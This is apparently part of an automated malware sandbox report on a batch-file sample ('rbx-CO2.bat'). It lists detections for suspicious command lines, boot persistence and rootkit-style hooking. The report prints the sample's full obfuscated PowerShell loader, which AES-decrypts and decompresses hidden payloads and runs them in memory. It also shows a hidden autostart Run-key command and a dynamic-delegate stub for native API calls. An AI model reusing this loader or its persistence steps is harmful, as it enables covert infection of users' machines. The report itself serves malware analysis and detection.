''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Suspicious command line found
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC401E3C LoadLibraryA,GetProcAddress,SleepEx,17_2_00000253FC401E3C
Source: C:\Windows\System32\cmd.exeCode function: 17_3_00000253FC3EA7DD push rcx; retf 003Fh17_3_00000253FC3EA7DE
Source: C:\Windows\System32\conhost.exeCode function: 18_3_000002A5AF34A7DD push rcx; retf 003Fh18_3_000002A5AF34A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E00BD pushad ; iretd 36_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E63D1 push ebx; retf 0009h36_2_00007FFD343E642A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EB05C push esp; retf 36_2_00007FFD343EB05D
Source: C:\Windows\System32\conhost.exeCode function: 37_3_000001780D3FA7DD push rcx; retf 003Fh37_3_000001780D3FA7DE
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000020175E9A7DD push rcx; retf 003Fh38_3_0000020175E9A7DE
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_000002D01659A7DD push rcx; retf 003Fh39_3_000002D01659A7DE

Boot Survival

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-FHOIapsb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Hooks files or directories query functions (used to hide files and directories)
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Modifies the prolog of user mode functions (user mode inline hooks)
Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
